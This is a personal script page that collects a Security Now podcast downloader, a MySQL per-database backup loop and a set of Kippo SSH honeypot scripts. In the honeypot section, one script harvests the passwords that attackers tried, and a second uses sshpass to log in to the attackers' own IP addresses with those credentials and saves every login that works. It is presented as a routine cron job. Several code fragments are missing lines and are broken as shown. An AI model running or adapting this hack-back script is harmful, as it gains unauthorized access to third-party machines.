This script is a work by Webmaster Seth Leedy, but was inspired by and evolved from the scripts by [email protected]
I noticed that I was mentioned in the Security Now show(epi: 457, 558). Yipee!
Download any or all Steve Gibson’s GRC Security Now podcasts via a bash script.
The script can look at the episodes already downloaded and download the next one.
You can specify the episode(s). Download 1 or a range.
Another function is to search for text within ALL the episodes and copy the episode text to another directory for further reading.
Run it with “-h” for all the other options.
The code is now on GitHub ! Feel free to help develop it or fork it.
You can submit issues within GitHub or via email to me. Comments below are not actively monitored…
Command line examples:
- Will download the latest episode and it will be the TEXT transcriptions.
- ./GRC-Downloader.sh -eptxt -latest
- Will download the latest episode and it will be the PDF transcriptions.
- ./GRC-Downloader.sh -eppdf -latest
- This will download the TEXT and .PDF.
- ./GRC-Downloader.sh -eppdf -eptxt -latest
- The arguments -ahq and -alq is for downloading AUDIO .MP3 files.
- -AHQ = High Quality. -ALQ = Low Quality.
- The arguments -vhq and -vlq is for downloading VIDEO .MP4 files.
- -VHQ = High Quality. -VLQ = Low Quality.
- ./GRC-Downloader.sh -alq -vlq -eptxt -latest
- ./GRC-Downloader.sh -vlq -eptxt -ep 10
- You can also download all video, in HD, and text- at once. At 10 downloads a time. *Not all episodes are in HD. The start of the show was not in video, let alone, HD.
- ./GRC-Downloader.sh -vhd -eptxt -ep 1:latest -pd 10
- Will download every single text copy of the episodes and search for your text (TNO here) and put the results in a special directory for you to open at your leisure.
- ./GRC-Downloader.sh -dandstxt TNO
- Will search only the text episodes already downloaded in the current directory and the cache used in the above -dandstxt option. It will not go online to search.
- ./GRC-Downloader.sh -stxt TNO
- Create a RSS feed file from the shows!
Count of script executions:
13,465 total views
The paths are needing adjusted to work for your placement.
Two places to change. Number one is the matrix.sh file. You will see it below.
Number two is the matrix_char.sh file. The very first part.
1,572 total views
This could be expanded upon. Have fun and submit back your changes..
906 total views
First we log all the connection attempts to my server(Live or new Virtual Machine) using the package called Kippo – http://code.google.com/p/kippo/.
Then we create this file I called grab_ssh_info.sh(Click for latest).
# Run this every day at least in order to get all the entries.
# Run this before the logrotate does its work on the kippo log(You are rotating it right?) for the day/week/month$
# Cron could be 44 min mark every hour so when it rotates at midnight you will not lose much data.
# Start a new log.
if [ -e /root/scripts/kippo_ssh_auths.log ]; then
# Since I am only looking at the recent listings, only look at todays based on the date timestamp
# Only read todays and loop each line in the string
grep -i $todays_date /home/ris/kippo-0.5/log/kippo.log | while read -r line; do
# Only read the lines that contain login auths and IPs. All in one line in this case.
echo $line | grep -i "login attempt" ]]; then
# Cut out the different parts.
echo $line | grep -i "login attempt" | cut -d '[' -f 2 | cut -d ',' -f 3 | cut -d ']' -f 1
echo $line | grep -i "login attempt" | cut -d '[' -f 3 | cut -d '/' -f 1
echo $line | grep -i "login attempt" | cut -d '[' -f 3 | cut -d '/' -f 2 | cut -d ']' -f 1
# Throw it all in together for outputing to a log of my own.
# IF we do not already have it in the log, append the info to it.
if [ ! -e /root/scripts/kippo_ssh_auths.log ]; then
grep -q "$output" /root/scripts/kippo_ssh_auths.log
if [ $? == 1 ]; then
echo "$inIP|$inUSER|$inPASS" >> /root/scripts/kippo_ssh_auths.log
Then we can use the copy of /root/kippo_ssh_auths.log log to try and connect BACK to the door knockers machine and see if the login works.
If it does, add it to a success log(if new) and go on to the next one.
If it fails, ignore it. It will be deleted when we delete the copy of the log file at the end of the script.
I call this file test_ssh_info.sh
# This script will take mv the /root/scripts/kippo_ssh_auths.log log to /root/scripts/test_ssh_auths.log
# so we can safely work on it.
# After moving, it will go line by line and take the arguments and test them by ssh.
# If it works, the info will be written to another log, /root/scripts/valid_ssh_auths.log for any other usage.
# Suggest running at 45 min mark every hour. Right after the grab info script.
mv /root/scripts/kippo_ssh_auths.log /root/scripts/test_ssh_auths.log
# Old string seperator
# The one we want
while read line; do
echo "Testing: $line"
# Split the line into a array
# Format IP|USERNAME|PASSWORD
# echo "$testip $testuser $testpass"
# Use the tool sshpass to passthrough a password to ssh
# How can I do this in parallel ?
sshpass -p "$testpass" ssh -q -o "StrictHostKeyChecking no" -l "$testuser" $testip "exit"
# sshpass -p "$testpass" ssh -o "StrictHostKeyChecking no" -l "$testuser" $testip "exit"
# echo "Return Code: $testssh"
# sshpass will exit with code 0 if it logged in ok.
# ?? I was testing it and had some errors using the script. It would exit with 5. If I did it manualy, it worked $
if [ $testssh == 0 ]; then
if [ ! -e /root/scripts/valid_ssh_auths.log ]; then
grep -q "$output" /root/scripts/valid_ssh_auths.log
if [ $? == 1 ]; then
echo "$line" >> /root/scripts/valid_ssh_auths.log
echo "Valid: $line"
echo "NOT Valid: $line"
done < /root/scripts/test_ssh_auths.log;
# Change back the String Seperator
# Remove the log that we tested
Small script(start_kippo.sh) for cron to make sure your Kippo is still running.
I noticed that the small VPS I was running would kill Kippo once awhile because I ran out of memory(32MB) and swap(32MB). So I tested every minute to see if needed starting again.
ps aux | grep -i twistd | grep -q -i kippo
if [ $code == 1 ]; then
sudo -u ris /home/ris/kippo-0.5/start.sh
echo "Started Kippo again."
Set your log rotation to cycle the Kippo log every 24 hours or my scripts will be re testing a lot of ssh connections.
Set your cron to run them whenever. I recommend just before the logrotate cycle. Just make sure it is sequenced right. Do the grab script first.
1,373 total views
Backup all mysql databases to separate dump files
It’s easy to just simple do a
mysqldump --alldatabases > mysqlbackup.sql
to backup everything into a large SQL dump, so that you have the inserts there if you have a booboo happening. But what a nightmare you face when you just have to get those lines that affect your recently-crashed site! Well, there’s a bit more sophisticated, but much better solution: have each of your database backed up in a separate SQL dump file with the following shell script:
for i in /var/lib/mysql/*/; do
/usr/bin/mysqldump $dbname > /home/db_backups
Of course you might have to add login parameters to the mysql line above, but that shouldn’t be a problem. (Hint: -u myusername –password=mysecretpassword)
865 total views, 1 views today